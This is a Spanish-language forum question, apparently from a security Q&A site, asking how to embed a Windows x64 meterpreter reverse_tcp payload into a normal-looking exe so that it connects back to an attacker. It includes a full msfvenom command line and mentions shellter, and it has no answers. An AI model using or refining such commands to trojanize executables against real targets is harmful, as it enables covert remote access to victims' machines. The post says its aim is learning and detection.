Inyectar una carga útil en un archivo exe

0

¿Cómo se inyecta una carga útil (por ejemplo, windows / x64 / meterpreter / reverse_tcp) en un archivo exe?

Básicamente, cuando el objetivo abre el archivo exe, parece normal y funciona como tal, pero en segundo plano, crea una puerta trasera y establece una conexión con el atacante.

He intentado usar msfvenom así:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=x -x /root/testExe.exe -k -a x64 --platform windows -e x64/xor_dynamic -i 3 -n 26 -f exe -o payloadTest.exe

Esto no funcionó, cada vez que intenté ejecutarlo recibí el mensaje:
payloadTest.exe is not a valid Win32 application

Sin el -x /root/testExe.exe -k funcionó bien.

También probé shellter pero solo funciona con cargas de 32 bits.

El sistema que intento atacar es Windows 7 64 bit . El archivo "testExe" tiene una arquitectura de 64 bits y un archivo de trabajo sin la carga útil en el sistema de la víctima.

En resumen, estoy buscando una manera de enlazar la carga windows / x64 / meterpreter / reverse_tcp a un archivo exe llamado "testExe", de modo que cuando el objetivo abre el "testExe" archivo, la carga útil dentro del archivo se conecta de nuevo al atacante.

Estoy tratando de aprender cómo se inyectan las cargas útiles en archivos exe y cómo Se pueden detectar. He visto algunos ejemplos con instaladores que Parecen legítimos pero abren una sesión de meterpreter para el atacante. Es hay una manera de confirmar que su archivo exe es legítimo y no lo hace tiene una puerta trasera (además de verificar con antivirus).

    
pregunta beannshie223 20.11.2018 - 21:05
fuente

0 respuestas

Lea otras preguntas en las etiquetas